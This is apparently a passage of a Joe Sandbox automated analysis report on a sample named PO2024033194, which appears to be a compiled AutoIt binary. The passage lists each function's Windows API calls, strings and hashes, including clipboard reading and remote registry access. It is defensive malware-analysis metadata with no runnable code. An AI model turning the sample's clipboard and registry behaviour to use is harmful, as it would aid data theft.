                                                                  • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                  • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                  • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                  • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                  • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                  • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                  • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                  • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                  • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                  • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                  • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                  • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                  • _wcslen.LIBCMT ref: 00459916
                                                                  • _wcscpy.LIBCMT ref: 0045993A
                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                  • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                  • GetDC.USER32(00000000), ref: 004599FC
                                                                  • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                  • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                  • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                  • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                  • API String ID: 4040870279-2373415609
                                                                  • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                  • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                  • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                  • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                  Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSysColor.USER32(00000012), ref: 0044181E
                                                                  • SetTextColor.GDI32(?,?), ref: 00441826
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                  • GetSysColor.USER32(0000000F), ref: 00441849
                                                                  • SetBkColor.GDI32(?,?), ref: 00441864
                                                                  • SelectObject.GDI32(?,?), ref: 00441874
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                  • GetSysColor.USER32(00000010), ref: 004418B2
                                                                  • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                  • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                  • DeleteObject.GDI32(?), ref: 004418D5
                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                  • FillRect.USER32(?,?,?), ref: 00441970
                                                                    • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                    • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                    • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                    • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                    • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                    • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                    • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                    • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                    • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                    • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                    • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                    • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                    • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                  • String ID:
                                                                  • API String ID: 69173610-0
                                                                  • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                  • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                  • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                  • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                  Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DestroyWindow.USER32(?), ref: 004590F2
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                  • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                  • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                  • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                  • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                  • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                  • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                  • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                  • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                  • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                  • API String ID: 2910397461-517079104
                                                                  • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                  • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                  • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                  • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                  Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsnicmp
                                                                  • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                  • API String ID: 1038674560-3360698832
                                                                  • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                  • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                  • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                  • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                                  Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                  • SetCursor.USER32(00000000), ref: 0043075B
                                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                  • SetCursor.USER32(00000000), ref: 00430773
                                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                  • SetCursor.USER32(00000000), ref: 0043078B
                                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                  • SetCursor.USER32(00000000), ref: 004307A3
                                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                  • SetCursor.USER32(00000000), ref: 004307BB
                                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                  • SetCursor.USER32(00000000), ref: 004307D3
                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                  • SetCursor.USER32(00000000), ref: 004307EB
                                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                  • SetCursor.USER32(00000000), ref: 00430803
                                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                  • SetCursor.USER32(00000000), ref: 0043081B
                                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                  • SetCursor.USER32(00000000), ref: 00430833
                                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                  • SetCursor.USER32(00000000), ref: 0043084B
                                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                  • SetCursor.USER32(00000000), ref: 00430863
                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                  • SetCursor.USER32(00000000), ref: 0043087B
                                                                  • SetCursor.USER32(00000000), ref: 00430887
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                  • SetCursor.USER32(00000000), ref: 0043089F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Cursor$Load
                                                                  • String ID:
                                                                  • API String ID: 1675784387-0
                                                                  • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                  • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                  • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                  • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                  Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSysColor.USER32(0000000E), ref: 00430913
                                                                  • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                  • GetSysColor.USER32(00000012), ref: 00430933
                                                                  • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                  • GetSysColor.USER32(0000000F), ref: 00430959
                                                                  • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                  • GetSysColor.USER32(00000011), ref: 00430979
                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                  • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                  • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                  • SelectObject.GDI32(?,?), ref: 004309B4
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                  • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                  • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                  • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                  • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                  • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                  • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                  • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                  • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                  • DeleteObject.GDI32(?), ref: 00430AE9
                                                                  • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                  • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                  • String ID:
                                                                  • API String ID: 1582027408-0
                                                                  • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                                  • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                  • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                                  • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                  Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CloseConnectCreateRegistry
                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                  • API String ID: 3217815495-966354055
                                                                  • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                                  • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                  • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                                  • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                  Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 004566AE
                                                                  • GetDesktopWindow.USER32 ref: 004566C3
                                                                  • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                  • DestroyWindow.USER32(?), ref: 00456746
                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                  • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                  • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                  • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                  • IsWindowVisible.USER32(?), ref: 0045682C
                                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                  • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                  • GetWindowRect.USER32(?,?), ref: 00456873
                                                                  • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                  • CopyRect.USER32(?,?), ref: 004568BE
                                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                  • String ID: ($,$tooltips_class32
                                                                  • API String ID: 225202481-3320066284
                                                                  • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                  • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                  • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                  • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                  Function 0046DCB4 Relevance: 36.2, APIs: 24, Instructions: 247clipboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                  • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                  • CloseClipboard.USER32 ref: 0046DD0D
                                                                  • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                  • CloseClipboard.USER32 ref: 0046DD41
                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                  • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                  • CloseClipboard.USER32 ref: 0046DD99
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                  • String ID:
                                                                  • API String ID: 15083398-0
                                                                  • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                  • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                  • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
